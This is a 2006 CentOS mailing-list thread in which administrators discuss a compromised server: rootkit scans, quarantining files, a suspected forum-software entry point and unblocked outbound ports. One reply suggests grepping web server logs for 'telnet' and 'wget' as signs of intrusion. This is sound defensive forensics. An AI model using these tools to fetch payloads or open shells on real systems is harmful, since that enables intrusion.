[CentOS] Uselib24/bindz - owned!

Tue May 9 00:18:07 UTC 2006
Benjamin Smith <lists at benjamindsmith.com>

A little hint that's helped me identify what happened before: 

Use grep to look for things like "telnet" and "wget" in the httpd logs. Since 
it doesn't exactly look like you've been rooted, these are probably intact 
and available. 

May be obvious, but it may also have been missed.... 


On Wednesday 03 May 2006 22:37, Nick wrote:
> Rick Philbrick wrote:
> > Hi,
> >
> > Well thats telling.  So do you have chkroot-kit installed?  Although
> > you know you've got to have a root-kit on there. Anyway, it may help
> > narrow your search of the directories and the changes within.
> >
> > -rickp
> >
> Well i quarantined the files and then ran rkhunter and chkrootkit and 
> both came back ok. Not going to risk not starting over on the box but if 
> i can't tell how they got in then I'm not stopping it happening again. 
> It could of course have something to do with one of the webapps the box 
> runs (forum software)...
> Also i found my iptables script wasn't blocking port 80 and port 21 
> outbound.... school boy error.
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.

"The best way to predict the future is to invent it."
- XEROX PARC slogan, circa 1978